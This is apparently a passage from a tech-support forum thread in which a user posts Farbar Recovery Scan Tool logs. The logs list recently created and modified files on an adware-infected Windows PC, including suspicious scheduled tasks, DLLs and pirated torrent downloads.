    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
  14. Gitanjali

    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2016-01-10 18:13 - 00000000 ____D C:\FRST
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Task Service
    2016-01-10 15:09 - 2016-01-10 15:09 - 00000000 ____D C:\Program Files\Scan Service
    2016-01-10 15:07 - 2016-01-10 15:09 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
    2016-01-10 15:07 - 2016-01-10 15:09 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
    2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
    2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
    2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
    2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2016-01-09 21:13 - 2016-01-10 16:13 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
    2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
    2016-01-09 21:00 - 2016-01-09 21:00 - 00019912 ____H C:\WINDOWS\Tasks\{0B7F0947-7E7A-0B05-7E11-797A790F110F}.job
    2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
    2016-01-09 20:58 - 2016-01-09 20:58 - 00019720 ____H C:\WINDOWS\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}.job
    2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
    2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
    2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
    2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
    2016-01-09 19:33 - 2016-01-10 18:13 - 00724154 _____ C:\WINDOWS\ntbtlog.txt
    2016-01-09 19:24 - 2016-01-09 19:24 - 00003284 _____ C:\WINDOWS\System32\Tasks\psv_Temptough
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
    2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
    2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
    2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
    2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
    2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
    2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
    2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
    2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
    2016-01-09 18:09 - 2016-01-10 16:09 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
    2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
    2016-01-09 18:09 - 2016-01-09 18:09 - 00023024 _____ C:\WINDOWS\System32\Tasks\{0D0F7F47-0B7A-097F-7E11-050A09041178}
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
    2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
    2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
    2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
    2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
    2016-01-09 17:22 - 2016-01-09 17:22 - 00003270 _____ C:\WINDOWS\System32\Tasks\psv_Tripplezap
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
    2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
    2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
    2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
    2016-01-09 16:42 - 2016-01-10 16:09 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
    2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
    2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
    2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
    2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
    2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
    2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004186 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Pending Update
    2016-01-09 16:40 - 2016-01-09 16:40 - 00004176 _____ C:\WINDOWS\System32\Tasks\SwiftSearch Auto Updater 1.10.0.25 Core
    2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
    2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004988 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
    2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
    2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
    2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
    2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
    2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
    2016-01-09 16:33 - 2016-01-10 16:09 - 00000352 ____H C:\WINDOWS\Tasks\UXJOVQQVBISGUWLJ.job
    2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
    2016-01-09 16:33 - 2016-01-09 20:15 - 00000000 ____D C:\Program Files\Sound+
    2016-01-09 16:33 - 2016-01-09 16:33 - 00003360 _____ C:\WINDOWS\System32\Tasks\UXJOVQQVBISGUWLJ
    2016-01-09 16:33 - 2016-01-09 16:33 - 00002854 _____ C:\WINDOWS\System32\Tasks\LSNHDG1
    2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
    2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
    2016-01-09 16:32 - 2016-01-09 16:32 - 00041472 _____ C:\Users\owner\AppData\Local\Donelectronics.dat
    2016-01-09 16:32 - 2016-01-09 16:32 - 00028160 _____ C:\Users\owner\AppData\Local\Donelectronics.exe
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000187 _____ C:\Users\owner\AppData\Local\Donelectronics.exe.config
    2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
    2016-01-09 16:31 - 2016-01-10 16:08 - 00000000 ____D C:\ProgramData\ApplicationHosting
    2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
    2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
    2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
    2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
    2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
    2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
    2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ____D C:\Program Files\amztab
    2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
    2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
    2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
    2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
    2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
    2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
    2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
    2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
    2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
    2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
    2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
    2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
    2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
    2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
    2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
    2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
    2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
    2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
    2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
    2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
    2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
    2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
    2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
    2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
    2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
    2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
    2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
    2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
    2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
    2016-01-07 07:28 - 2016-01-10 16:10 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
    2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
    2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
    2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
    2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
    2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
    2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
    2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
    2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
    2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
    2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
    2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
    2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
    2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
    2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
    2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
    2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
    2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
    2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
    2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
    2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
    2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
    2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
    2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
    2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks
    2015-12-17 12:48 - 2015-12-17 12:48 - 00000000 ____D C:\Program Files (x86)\Bethesda Softworks
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Users\owner\AppData\Local\PAYDAY 2
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
    2015-12-14 18:15 - 2015-12-14 18:15 - 00000000 ____D C:\Program Files (x86)\AGEIA Technologies
    2015-12-13 15:06 - 2016-01-10 14:56 - 00001188 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Express Zip File Compression.lnk
    2015-12-13 15:06 - 2015-12-13 15:06 - 00374903 _____ C:\Users\owner\Downloads\Athenas *** MH4G 0.81b.rar
    2015-12-11 09:48 - 2016-01-09 18:47 - 00000000 ____D C:\WINDOWS\Minidump
     
  15. Gitanjali

    Gitanjali TS Rookie Topic Starter Posts: 83

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-01-10 18:13 - 2013-08-22 05:36 - 00000000 ____D C:\Windows
    2016-01-10 18:06 - 2014-11-21 00:44 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-01-10 18:06 - 2013-08-22 05:36 - 00000000 ____D C:\WINDOWS\Inf
    2016-01-10 16:15 - 2015-04-08 11:24 - 00000000 ____D C:\Users\owner\AppData\Roaming\uTorrent
    2016-01-10 16:15 - 2015-04-08 11:23 - 00000000 ____D C:\Users\owner\AppData\Roaming\Spotify
    2016-01-10 16:15 - 2015-04-02 18:05 - 00000000 ____D C:\Program Files (x86)\Steam
    2016-01-10 16:15 - 2013-08-22 06:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-01-10 16:14 - 2015-01-20 17:04 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3773202632-424774445-890114178-1001
    2016-01-10 16:10 - 2015-04-08 11:25 - 00000000 ____D C:\Users\owner\AppData\Local\Spotify
    2016-01-10 16:10 - 2015-03-31 11:26 - 00000000 ___RD C:\Users\owner\OneDrive
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
    2016-01-10 16:09 - 2015-03-30 19:02 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
    2016-01-10 15:04 - 2015-09-16 07:26 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
    2016-01-10 14:56 - 2015-11-24 22:00 - 00001122 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
    2016-01-10 14:56 - 2015-10-26 15:43 - 00001112 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Voxal Voice Changer.lnk
    2016-01-10 14:56 - 2015-04-16 18:45 - 00002445 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
    2016-01-10 14:56 - 2015-04-16 18:28 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2016-01-10 14:56 - 2015-04-08 11:26 - 00000877 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
    2016-01-10 14:56 - 2015-03-30 20:52 - 00002523 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
    2016-01-10 14:56 - 2015-01-22 22:29 - 00001511 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-01-10 14:56 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\System
    2016-01-10 14:56 - 2012-10-09 15:00 - 00002423 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk
    2016-01-10 14:56 - 2012-10-09 14:53 - 00001923 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001673 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer User's Manual.lnk
    2016-01-10 14:56 - 2012-09-03 08:23 - 00001655 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Quick Guide.lnk
    2016-01-10 14:56 - 2012-09-03 08:10 - 00002572 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WildTangent Games App - acer.lnk
    2016-01-10 14:55 - 2015-04-21 16:09 - 00000000 ____D C:\Program Files (x86)\SearchProtect
    2016-01-10 13:29 - 2013-08-22 05:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
    2016-01-09 21:28 - 2015-03-12 16:27 - 00000000 ____D C:\Users\owner\AppData\Local\Deployment
    2016-01-09 21:15 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\system32\NDF
    2016-01-09 21:09 - 2015-07-20 16:05 - 00000000 ____D C:\Users\owner\AppData\Roaming\Skype
    2016-01-09 21:09 - 2015-04-09 16:09 - 00551936 ___SH C:\Users\owner\Desktop\Thumbs.db
    2016-01-09 19:42 - 2015-05-13 19:04 - 00000000 ____D C:\Users\owner\AppData\Local\ElevatedDiagnostics
    2016-01-09 19:02 - 2012-07-25 21:26 - 00000301 _____ C:\WINDOWS\win.ini
    2016-01-09 18:47 - 2015-01-23 01:16 - 00000000 ___DC C:\WINDOWS\Panther
    2016-01-09 18:13 - 2015-06-07 15:45 - 00000000 ____D C:\Users\owner\AppData\Roaming\Curse Client
    2016-01-09 18:00 - 2015-06-07 13:52 - 00000000 ____D C:\Users\owner\AppData\Local\NexonLauncher
    2016-01-09 14:49 - 2015-02-26 12:13 - 00003910 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{59AA9515-0EFB-4314-9DA6-B2B84CDB5218}
    2016-01-08 14:02 - 2012-07-25 23:59 - 00000000 ____D C:\WINDOWS\CbsTemp
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
    2016-01-07 22:29 - 2013-08-22 07:36 - 00000000 ____D C:\WINDOWS\AppReadiness
    2016-01-06 00:14 - 2015-04-21 19:15 - 00000291 _____ C:\Users\owner\AppData\Roaming\WB.CFG
    2016-01-04 22:00 - 2015-01-22 22:26 - 00000000 ____D C:\Users\owner
    2016-01-03 21:49 - 2015-10-12 21:03 - 00000000 ____D C:\Users\owner\AppData\Roaming\TS3Client
    2016-01-03 21:42 - 2015-03-30 19:19 - 00000000 ____D C:\Users\owner\AppData\Roaming\Riot Games
    2016-01-03 20:37 - 2015-10-23 16:18 - 00000000 ____D C:\Users\owner\AppData\Local\Warframe
    2015-12-29 13:38 - 2013-08-22 06:44 - 00513128 _____ C:\WINDOWS\system32\FNTCACHE.DAT
